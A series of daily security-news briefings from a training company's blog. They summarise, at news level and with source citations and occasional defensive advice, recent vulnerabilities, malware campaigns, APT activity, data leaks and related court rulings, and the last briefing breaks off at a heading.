Les Bell and Associates Pty Ltd
Site blog
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Ancient Linux Vuln Allows Privilege Escalation
An eight-year old memory management vulnerability in the Linux kernel could allow privilege escalation, say three academics from NorthWestern University. The DirtyCred proof-of-concept exploit works by swapping unprivileged task credentials in memory with root credentials from a SetUID process, making use of a bug in the kernel's heap memory reuse code.
Lakshamanan, Ravie, "As Nasty as Dirty Pipe" - 8 Year Old Linux Kernel Vulnerability Uncovered, The Hacker News, 22 August 2022. Available online at https://thehackernews.com/2022/08/as-nasty-as-dirty-pipe-8-year-old-linux.html.
Healthcare Info of Almost 1.4 M Patients Exposed Via Ad Tracker
A US healthcare provider, Novant Health, has revealed that the sensitive information of 1,362,296 patients was accidentally disclosed when an advertising performance tracker script was misconfigured. The company added the Meta (formerly Pixel) JavaScript ad tracking script to a May 2020 promotional campaign for COVID-19 vaccinations which made use of Facebook advertisements.
However, the tracker was misconfigured both on the Novant Health site and the 'MyChart' portal, which allows patients to book appointments, request prescription refills and other services with 64 US healthcare providers. The misconfiguration exposed a long list of sensitive data, including email address, phone number, appointment type and date, both to Facebook/Meta and its advertising partners.
Novant discovered the issue in May 2022 and has contacted all the people affected. However, they also say that attempts to get Meta to delete the data were met with no response.
Toulas, Bill, Misconfigured Meta Pixel exposed healthcare data of 1.3M patients, Bleeping Computer, 22 August 2022. Available online at https://www.bleepingcomputer.com/news/security/misconfigured-meta-pixel-exposed-healthcare-data-of-13m-patients/.
Bitcoin Stolen from General Bytes ATM's
Unknown hackers have been able to exploit a fairly obvious vulnerability in the Crypto Application Server that controls General Bytes Bitcoin ATM's, and thereby steal cryptocurrencies from the ATM customers. The hack was achieved by the simple act of calling an admin URL that is used for initial installation of the server and creates the first admin user. By calling this API and creating an admin user called 'gb', the attackers were then able to modify the 'buy', 'sell' and 'invalid payment address' settings to use a crypto wallet that they controlled.
From that point on, any cryptocurrencies received by the ATM went to the hackers, rather than the intended destination.
The moral of the story? Review any installation scripts and remove them after installation has been completed. Allow admin access only from trusted subnets. And, of course, patch proactively.
Abrams, Lawrence, Hackers steal crypto from Bitcoin ATM's by exploiting zero-day bug, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/hackers-steal-crypto-from-bitcoin-atms-by-exploiting-zero-day-bug/.
LatentBot Mutates Into Grandoreiro
LatentBot is a trojan that dates back to 2013; written in Delphi, it has a modular design that allows it to download additional modules for keystroke logging, cookie-stealing and remote access. Since June 2022, a new derivative called Grandoreiro has appeared, targeting companies in Spanish-speaking countries with official-looking emails apparently from government agencies.
The victims are directed to download and share a document, but in practice, the link redirects to a malicious domain and then downloads a ZIP file containing the Grandoreiro loader. The loader goes through a number of antiforensics checks, such as walking through a list of currently executing processes, looking for malware analysis tools, seeing if it is being run from a particular directory, looking for debuggers and reading from an I/O port which is used by VMWare.
If all of this succeeds, it gathers some basic information, checks for the presence of crypto wallets which it will investigate later and then fetches the main payload. This uses even more antiforensics techniques - for example, it includes two tightly-compressed bitmapped images which, when expanded, inflate the resulting binary to over 400 MBytes, which exceeds the size limit for most execution sandboxes.
From there on, Grandoreiro communicates with its C2 network in exactly the same way as LatentBot, and can download any of a huge selection of backdoor capabilities.
Shivtarkar, Niraj, Grandoreiro Banking Trojan with New TTPs Targeting Various Industry Verticals, Zscaler ThreatLabz blog, 18 August 2022. Available online at https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals.
More Info on Mēris
Google has released a bit more information about last week's massive DDoS attack by the Mēris botnet. Apparently there were 5,256 source IP addresses from 132 countries engaged in the attack - approximately 22% of them Tor exit nodes (although these accounted for only 3% of the traffic). As previously mentioned, the use of TLS/SSL required the connections to be terminated in order to inspect the traffic, only relatively few TLS handshakes were required due to the use of HTTP pipelining, which sends multiple requests over a single HTTP connection.
Google Cloud Armor's 'Adaptive Protection' feature was apparently able to quickly identify the attack, alert the customer and recommend a protective rule - in this case, rate-limiting the connections, which would still allow legitimate traffic.
Kiner, Emil and Satya Kondaru, How Google Cloud blocked the largest Layer 7 DDoS attack at 46 million rps, Google Cloud blog, 19 August 2022. Available online at https://cloud.google.com/blog/products/identity-security/how-google-cloud-blocked-largest-layer-7-ddos-attack-at-46-million-rps.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Chip Makers Take On PQCrypto
We have written here before about the need for cryptographic agility - the ability to replace those public-key crypto algorithms that are expected to fall, sooner or later, to quantum cryptanalysis. That's a challenge, because most of the quantum-resistant algorithms are compute-intensive, but desktop, laptop and cloud server machines should be able to cope without too much difficulty.
However, the same is not true for the small, low-powered, system-on-a-chip devices that power the Internet of Things. This is especially true for the smart cards used as credit cards, access badges, etc., which will require specialised hardware to be able to perform acceptably. In the first part of an interview, Joppe W. Bos, senior principal cryptographer at NXP Semiconductor, explains some of the challenges - as co-creator of the CRYSTALS-Kyber algorithm recently adopted by NIST for standardization, he is in a unique position to describe the challenges.
Valerio, Pablo, Post-Quantum Cryptography needs to be ready to protect IoT, IoT Times, 17 August 2022. Available online at https://iot.eetimes.com/post-quantum-cryptography-needs-to-be-ready-to-protect-iot/.
Intel Adds CPU Circuitry to Defeat Power-On Attacks
Processors that incorporate a Trusted Platform Module have an obscure vulnerability in which an attacker manipulates the voltage supplied to the CPU at just the right time - as it is loading the firmware for its security engine. By triggering an error condition just then, the attacker could get the security engine to load malicious firmware, which would then grant the attacker to some data, such as biometric templates, stored in the TPM.
Now Intel is adding a tunable replica circuit to the company's 12th generation Alder Lake Core processors, which correlates the times and voltages at which the various circuits on a motherboard power up, and if they don't match, will generate an error and failsafe reset. The circuit is being added to these laptop processors because the attack - which remains theoretical at this stage - requires physical access to the motherboard, something that is harder to achieve for server and desktop machines.
Shah, Agam, Intel Adds New Circuits to Chips to Ward Off Motherboard Exploits, Dark Reading, 20 August 2022. Available online at https://www.darkreading.com/dr-tech/intel-adds-new-circuit-to-chips-to-ward-off-motherboard-exploits.
Fake Cloudflare DDoS Protection Pages Trick Users Into Installing Trojans
Occasionally, when visiting a busy web site, you will see a Cloudflare DDoS protection page that holds you up for a few seconds, as a way of rate-limiting bots which are attempting to overwhelm the site with bogus requests. In a new social engineering twist, hackers are using weakly protected WordPress sites to host an obfuscated JavaScript payload that displays the Cloudflare DDoS page - but then asks the visitor to click on a button to bypass the delay. This downloads a container file called 'security_install.iso', which the victim is told installs a program called DDOS GUARD that will get them faster access.
In fact, this is actually a link to the first of a chain of Windows PowerShell scripts which culminate with installing the NetSupport remote access trojan and the Raccoon Stealer password stealer on the victim's system.
Defensive techniques include better hardening WordPress sites, and educating users to never install programs that scareware messages are prompting them to download.
Toulas, Bill, WordPress sites hacked with fake Cloudflare DDoS alerts pushing malware, Bleeping Computer, 20 August 2022. Available online at https://www.bleepingcomputer.com/news/security/wordpress-sites-hacked-with-fake-cloudflare-ddos-alerts-pushing-malware/.
Gimme Cookie! Want Cookie!
A timely reminder that web security ultimately depends on cookies, which are vulnerable to a variety of stealing attacks. Although authentication to a web site might involve multi-factor authentication, once that has been done, everything depends on those cookies. And because those cookies can be quite long-lived - who wants to have to log in to a web site every few minutes? - markets are emerging where cookies are sold. Low-end cybercriminals can operate malware like Raccoon Stealer and RedLine Stealer, but may not have the sophistication to be able to make use of the credentials once they have acquired them - so they sell them on.
Once generated by a server, the cookies are also stored by the browser, usually in an SQLite database which may also store user ID and passwords. A variety of techniques can be used by the attacker to extract the cookies, which can then be used to take over MS Office 365 and Google Workspace sessions, among others.
Perhaps it's time for us to accept the inconvenience of having to re-authenticate more frequently in order to minimise the likelihood of this attack?
Gallagher, Sean, Cookie stealing: the new perimeter bypass, Sophos X-Ops, 18 August 2022. Available online at https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass/.
Attribution Insights from IBM X-Force Research
A fascinating deep dive into malware analysis from IBM X-Force Research shows how the Bumblebee malware, which first appeared last year, was probably developed from the source code of the Ramnit banking trojan. What is interesting about this - apart from the malware coding techniques uncovered - is that Bumblebee has been linked to offshoots of the Conti ransomware group. which fragmented following a series of high profile leaks of chat messages and the doxxing of some group members.
This suggests that the various spinoffs from Conti are forming new alliances and acquiring new TTP's, possibly heralding completely new attacks. The report makes fascinating reading for those who enjoy reverse-engineering malware.
Hammond, Charlotte and Ole Villadsen, From Ramnit to Bulblebee (via NeverQuest): Similarities and Code Overlap Shed Light on Relationships Between Malware Developers, IBM Security Intelligence, 18 August 2022. Available online at https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest/.
Online Scammers Often Victims Themselves
While we are all familiar with tech support scammers operating out of Mumbai, it seems that a new breed of financial scammers has arisen, operating out of Laos, Myanmar and Cambodia under the control of Taiwanese and Chinese scam bosses. In Cambodia, for example, giant casinos built to lure Chinese gamblers found themselves near-empty due to COVID travel restrictions and were re-purposed as scam operations, staffed by migrant workers lured by fraudulent job ads or even abducted off the street, and who are now held against their will in slave conditions.
The trafficked workers are forced to work from 8 am to 11 pm each day, and threatened or beaten if they do not raise enough money from their victims; trying to leave is dangerous, with some being killed and others recaptured. The gang bosses are well connected, both politically and to local police, who are notoriously lax in investigating or even side with the bosses. This is an untimely reminder that cybercrime isn't just about bits of information and purely financial gain, but sometimes crosses over into people trafficking, slavery and worse.
Kennedy, Lindsey and Nathan Paul Southern, The online scammer targeting you could be trapped in a South-East Asian fraud factory, The Sydney Morning Herald, 21 August 2022. Available online at https://www.smh.com.au/world/asia/the-online-scammer-targeting-you-could-be-trapped-in-a-south-east-asian-fraud-factory-20220818-p5baz3.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
New Variant of Jaca Malware Is Highly Configurable
An updated variant of the Jaca malware toolkit includes new components which form a long chain of actions to infect a victim's system, according to security consultancy Morphisec. The Windows toolkit has been used extensively by a South Asian threat actor called DoNot Team or APT-C-35, and they keep improving it.
The latest variant makes use of RTF (Rich Text Format) documents that trick the user into enabling macros. This then allows a macro to inject some shellcode into memory and that, in turn, downloads a second stage loader from its C2 server. It then downloads a DLL file from another C2 server, which sends system information back to its operators, makes itself persistent via a Scheduled Task and finally downloads the real payload, which will selectively exfiltrate data such as keystrokes, screenshots, files and browser data, using loadable modules.
This modularity gives DoNot Team considerable flexibility in adapting their malware, which they use to attack defence, diplomatic, government and military organizations in India, Pakistan, Sri Lanka and Bangladesh.
Cohen, Hido and Arnold Osipov, APT-C-35 Gets a New Upgrade, Morphisec Breach Prevention Blog, 11 August 2022. Available online at https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed.
Cryptominers Spread Via Python Repositories
Software developer and researcher Hauke Lübbers 'stumbled across', and security firm Sonatype has confirmed a threat actor who has deployed at least 241 malicious npm (Node Package Manager) and PyPI (the Python Package Index). The packages all bear similar names to popular open source projects like React and argparse, but actually will download and install the XMRig cryptominer to generate Monero crypto. All the packages were published by an account called '17b4a931'.
However, you would have to wonder about the abilities of a developer who would mistake 'r2act' for 'React'.
Sharma, Ax, More than 200 cryptomining packages flood npm and PyPI registry, Sonatype, 19 August 2022. Available online at https://blog.sonatype.com/more-than-200-cryptominers-flood-npm-and-pypi-registry.
Threat Actor Targets Hospitality and Travel
A small threat actor called TA558 is operating in Latin America, North America and Western Europe, targeting hospitality, travel and related industries. The group uses malmails written in Portuguese, Spanish and sometimes English, enquiring about reservations - something recipients cannot afford to ignore. However, the attachment is one of over 15 different malware payloads the group uses - mostly remote access trojans that can be used for reconnaisance, information exfiltration and the dropping of more advanced payloads.
The group has been active since at least 2018, but has ramped up its efforts in 2022, perhaps because post-COVID recovery travel growth offers them increased opportunities. They have also switched TTP's, from Word macros (now usually disabled) to malware such as Load, Revenge RAT and others, hosted at URL's or enclosed in container formats such as RAR and ISO files.
Wise, Joe, et. al., Reservations Requested: TA558 Targets Hospitality and Travel, Proofpoint blog, 18 August 2022. Available online at https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel.
Cozy Bear Targets Foreign Policy Info in Microsoft 365
Russian state-backed APT 29, aka Cozy Bear, has been busy this year, with new advanced TTP's which it uses to compromise Microsoft 365 accounts. The attackers used a brute-force attack on the self-enrollment process for MFA in Azure Active Directory to discover the usernames and passwords that had not yet logged into a domain, and then enrolled their own devices. Having done this, they were then free to roam around the domain.
In order to evade detection, the hackers also disabled the 'Purview Audit' feature which logs details of email accesses. They also used Azure VM's to run their exploits, making their activities hard to distinguish from all the regular traffic within the Azure networks - they all use Microsoft IP addresses.
Bienstock, Douglas, You Can't Audit Me: APT29 Continues Targeting Microsoft 365, Mandiant blog, 18 August 2022. Available online at https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft.
JWST Runs JavaScript. JavaScript?
While we all marvel at the stunning images being sent from the James Webb Space Telescope, it's interesting to reflect on the fact that the scripts that control the imaging instruments are actually written in JavaScript - actually a variant called Nombas ScriptEase 5.00e which was last updated in January 2003.
This really should not come as a big surprise - the JWST has been in development since 1989 and when construction started in 2004, Nombas ScriptEast 5.00e would have been less than two years old. It's not unusual for government and major scientific projects to use quite old and stable technology - NASA has in the past been known to search second-hand component markets for parts like 8086 processors, while other parts of government were still using VAXen long after the rest of the world had moved on.
Clark, Mitchell, The James Webb Space Telescope runs JavScript, apparently, The Verge, 18 August 2022. Available online at https://www.theverge.com/2022/8/18/23206110/james-webb-space-telescope-javascript-jwst-instrument-control.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
New Record HTTPS DDoS Attack
A massive DDoS attack, using the SSL/TLS protocol, was directed at one of Google's Cloud Armor DDoS protection customers in early June. The 69-minute attack started by sending 10,000 requests per second to the load balancer, but by 10 minutes later it had risen to a peak of 46 million requests per second - equivalent to receiving all the daily requests to Wikipedia within 10 seconds.
The attack seems to have been delivered by the Mēris botnet, although this is more than twice the rate it has previously achieved. Mēris works by using unsecured proxies to deliver traffic, and using TLS/SSL requires both the botnet and the victim to use a lot of compute power for key exchanges.
Ilascu, Ionut, Google blocks largest HTTPS DDoS attack 'reported to date', Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/google-blocks-largest-https-ddos-attack-reported-to-date/.
Prisoner Details Leaked by Misdirected Email
The Western Australian Department of Justice has had to apologise after sensitive details - full names, an image, date of birth and information about partners - of two prisoners were accidentally sent to the wrong distribution list.
The error occurred when an employee was trying to organize approval for an inter-prison phone call between family members, but picked the wrong list.
This kind of error happens frequently - one memorable case occurred when an employee of a major retail chain sent out a large spreadsheet containing details of gift cards to everyone who had purchased one of the gift cards. Unsurprisingly, a few of the recipients, having obtained details of so many tokens, took the opportunity to use them. If ever there was an argument for the use of groupware or - better still - automated workflows for approval processes, this is it.
Fiore, Briana, Department of Justice apologises over leak of 'sensitive' WA prisoner details, ABC News, 18 August 2022. Available online at https://www.abc.net.au/news/2022-08-18/department-of-justice-wa-apology-prisoner-information-leak/101346460.
Apple Releases Safari 15.6.1 to Fix Zero-Day Exploit
A buffer overflow vulnerability in the WebKit core of Apple's Safari browser has been sighted as an exploit in the wild, leading the company to release an update for their browser. Like other buffer overflows, this vuln could be used to crash the browser, corrupt data or even permit remote code execution.
Abrams, Lawrence, Apple releases Safari 15.6.1 to fix zero-day bug used in attacks, Bleeping Computer, 18 August 2022. Available online at https://www.bleepingcomputer.com/news/security/apple-releases-safari-1561-to-fix-zero-day-bug-used-in-attacks/.
Deep Analysis of APT 41, Winnti/Wicked Spider
Singapore-based security firm Group-IB has released a detailed report on the activities of the Chinese-backed threat actor APT 41, also known as Winnti or Wicked Spider. During 2021, APT 41 were very busy, hitting a total of 80 different private and public sector enterprises and using novel techniques to deploy its customized Cobalt Strike toolkit, perhaps to evade detection. They encoded the main binary into Base64, which was then broken up into chunks of 775 or 1,024 characters, then appended to a text file and directed at the victim using an SQL injection attack.
Using this technique, the attackers were only able to achieve success about half the time, suggesting they are more interested in victim quantity than quality. It seems that APT 41 may be a coalition of smaller groups, as they use a wide variety of tools after initial compromise and mix cyber-espionage activities with financial cybercrime.
Rostovstev, Nikita, APT41 World Tour 2021 on a tight schedule, Group-IB, 18 August 2022. Available online at https://blog.group-ib.com/apt41-world-tour-2021.
Janet Jackson Awarded CVE-2022-38392 for 'Rhythm Nation'
An interesting twist on malware variants than can cross air gaps: playing the Janet Jackson music video, Rhythm Nation, on one laptop can cause another nearby laptop to crash, as well as crashing the first computer. The vulnerability, discovered by a computer manufacturer in the Windows XP era, was found - after some serious research - to be due to the music audio matching a natural resonant frequency of the 5400 RPM disk drives used by that, and other, laptop manufacturers, and was fixed by adding a custom filter to block that part of the audio spectrum from reaching the speakers.
Urban myth? Perhaps, but nonetheless, MITRE has awarded it CVE-2022-3872.
Chen, Raymond, Janet Jackson had the power to crash laptop computers, Microsoft 'The Old New Thing' blog, 16 August 2022. Available online at https://devblogs.microsoft.com/oldnewthing/20220816-00/?p=106994.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Google Wins One, Loses One
Last year, the Australian Competition and Consumer Commission has found that Google breached Australian consumer law during 2017 and 2018 by telling Android users that the only Google account setting that they needed to change in order to stop the search giant collecting PII location data was the 'Location History' setting. Unfortunately, another Google account setting, 'Web & App Activity' also needed to be turned off - it was turned on by default.
Now the Federal Court has ordered Google to pay $60 million in penalties for this breach. Fortunately for Google, the offence occurred before the maximum penalty for breaches of Australian consumer law was increased - from November 2018 it was increased to the higher of $10 million, three times the benefit obtained from the alleged conduct or otherwise, 10% of turnover.
On the other hand, in an appeal to the High Court, Google's argument that a search engine is not a publisher was successful. The High Court overturned two previous rulings that Google was a publisher and by refusing to take down a link, was guilty of defaming a Melbourne lawyer. Google's argument was that a hyperlink only communicates that something exists or where it exists, and that it is the operator of the web page who communicates the content to the user. In a majority ruling, the High Court agreed: "The provision of a hyperlink in the Search Result merely facilitated access to the ... article and was not an act of participation in the bilateral process of communicating the the contents of that article to a third party".
ACCC Media Team, Google LLC to pay $60 million for misleading representations, media release, 12 August 2022. Available online at https://www.accc.gov.au/media-release/google-llc-to-pay-60-million-for-misleading-representations.
Byrne, Elizabeth, High Court finds Google is not a publisher in crucial win for search engine, ABC News, 17 August 2022. Available online at https://www.abc.net.au/news/2022-08-17/high-court-decision-google-not-publisher-george-defteros/101340622.
Secure Boot Loader Causes More Problems
We previously wrote about problems with the Windows secure boot process being subverted by some vendors' code. Unfortunately, it seems the cure is worse than the disease, for some users at least.
Last week's patch, KB5012170, added the signatures of the vendors' files to the Secure Boot Forbidden Signature database, which contains the UEFI revocation list. However, systems which do not have a valid bootloader will generate a 0x800f0922 error and fail to install the patch - fortunate for the user, as the system would not boot if the patch was applied.
Other users are reporting that after the patch is applied, Windows 11 PC's are booting to a BitLocker recovery screen - not a problem if the user has the recovery key, but unfortunately they almost never do. In well-managed environments, a domain administrator can recover the key from Active Directory Domain Services.
Windows 10 users are reporting other problems - slow boot times or their RAID mode being changed to AHCI in the firmware settings, triggering a Blue Screen of Death.
Speed, Richard, Microsoft's Secure Boot fix sends some PCs into BitLocker Recovery, The Register 15 August 2022. Available online at https://www.theregister.com/2022/08/15/bitlocker_microsoft/.
Millions of Realtek-based Network Devices Vulnerable
Researchers from Argentinian company Faraday Security have demonstrated proof-of-concept code to exploit a vulnerability they have discovered in the Realtek RTL819x system-on-a-chip (SOC). This chip is used in millions of networking devices such as routers.
Ilascu, Ionut, Exploit out for critical Realtek flaw affecting many networking devices, Bleeping Computer, 16 August 2022. Available online at https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/.
Equifax Fallout Continues; SEC Charges Three
We have written previously about security governance requirements, and in particular the guidance issued by the SEC in February 2018, which seemed to have been triggered by their investigations of the infamous Equifax breach. The same incident continues to have repercussions, this time for a finance manager who worked at the public relations firm engaged by Equifax to assist with the breach, as well as her husband and his brother. The SEC alleges that upon learning of the breach, Ann M. Dishinger tipped off her husband, who arranged with a former business client to buy put options on Equifax on the understanding that they would split any profits realized. The SEC also alleges that he also helped his brother set up a similar arrangement with an old high school friend. These arrangements allegedly netted approximately $US108,000 in profits, split between the participants.
U.S. Securities and Exchange Commission, SEC Charges Three Chicago-Area Residents with Insider Trading Around Equifax Data Breach Announcement, Litigation Releast No. 25470, 16 August 2022. Available online at https://www.sec.gov/litigation/litreleases/2022/lr25470.htm.
Chrome Zero-Day In The Wild
A vulnerability in the Chrome desktop browser, first publicly disclosed by Google Threat Analysis Group in July, now has an exploit circulating in the wild. CVE-2022-2856 is a case of insufficient validation of user input, and has Google has responded by pushing out an update, which also fixes ten other security flaws, mostly relating to free-after-use bugs in Chrome components.
Lakshamanan, Ravie, New Google Chrome Zero-Day Vulnerability Being Exploited in the Wild, The Hacker News, 18 August 2022. Available online at https://thehackernews.com/2022/08/new-google-chrome-zero-day.html.
Trojan Dropper Lives On, Thanks to Anti-Forensics
Researchers from Secureworks have done a deep analysis on a sophisticated trojan dropper called DarkTortilla which has been circulating since 2015, yet manages to still spread widely, dropping malware on behalf of a wide range of threat actors, due to its complex anti-forensics techniques.
DarkTortilla usually activates via targeted malmails containing infected attachments, often zip files and other archives, or ISO images. When the user double-clicks to open the contained document, they actually run the DarkTortilla initial loader. From there, the core component goes to work, but what it does is highly configurable, with the configuration controlled by bitmap images. It will typically check to see if it is running in a virtual machine or sandbox, set up registry keys so it can persist, migrate itself to the Windows %TEMP% directory, process any add-on files, and switch execution environment to its install directly. Once this is done, it injects and executes its main payload, taking additional steps to prevent interference with its various components.
Different threat actors will use DarkTortilla to deliver any of several different payloads - usually remote access trojans such as AgentTesla, NanoCore and AsyncRat, but also keystroke loggers and toolkits such as Metasploit and Cobalt Strike. Occasionally, it will deliver ransomware.
It is easy to see why this trojan dropper has lived so long - it's incredibly versatile and valuable to threat actors, and its sophisticated anti-forensics and configurability represent a considerable investment which is worth maintaining.
Counter Threat Unit Research Team, DarkTortilla Malware Analysis, Secureworks, 17 August 2022. Available online at https://www.secureworks.com/research/darktortilla-malware-analysis.
Lazarus Group Chases Crypto Via Job Seekers
North Korean threat groups notoriously pursue hard currency and crypto assets in an attempt to bypass sanctions, and Lazarus Group has recently been discovered targeting fintech job seekers using an infected PDF containing information about a job opening at exchange operator Coinbase.
While initial attacks infected Windows machines only, the latest variant also targets Mac users, with a malware payload signed with a certificate issued by Apple and possibly revoked by now.
Ilascu, Ionut, North Korean hackers use signed macOS malware to target IT job seekers, Bleeping Computer, 17 August 2022. Available online at https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-signed-macos-malware-to-target-it-job-seekers/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
(ISC)2 Election Process Criticised
As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, point out some glaring flaws in the process:
- The Board apparently changed the process for nomination after the election was announced.
- This change was not announced to the membership.
- Nevertheless 85 people submitted nominations to run, but
- The Board reviewed these nominations, and then selected five candidates to run for the five open seats.
In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.
Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.
Ransomware Operators Hit UK Water Supplier
A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response Thames Water issued a statement via its website stating that it had not suffered a cyber-attack, and instead South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim of the attack. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.
Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.
Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.
PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox
Kaspersky, Snyk and Checkpoint have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Checkpoint used code in the _init_.py file of the setup script to download and run a script which would search for and exfiltrate local passwords.
The latest discoveries include 12 distinct pieces of malware belonging to the same actor, and uses PyInstaller to bundle a malicious application and its dependencies into one package which is then distributed via the Discord content delivery network, from where it infiltrates user browsers. It then exfiltrates passwords, cookies, web history and other data which the attackers can use to pivot to other targets using the stolen credentials.
The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.
Bezcershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.
Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.
Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Checkpoint Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.
Another Hardware Vulnerability in AMD processors
In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.
Gast, Stefan, et. al., SQUIIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.
Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.
Russian APT Phishes Defence, Intelligence, Academics
Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, thinktanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.
The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.
Lakshamanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.
Aussie Roots Tractor
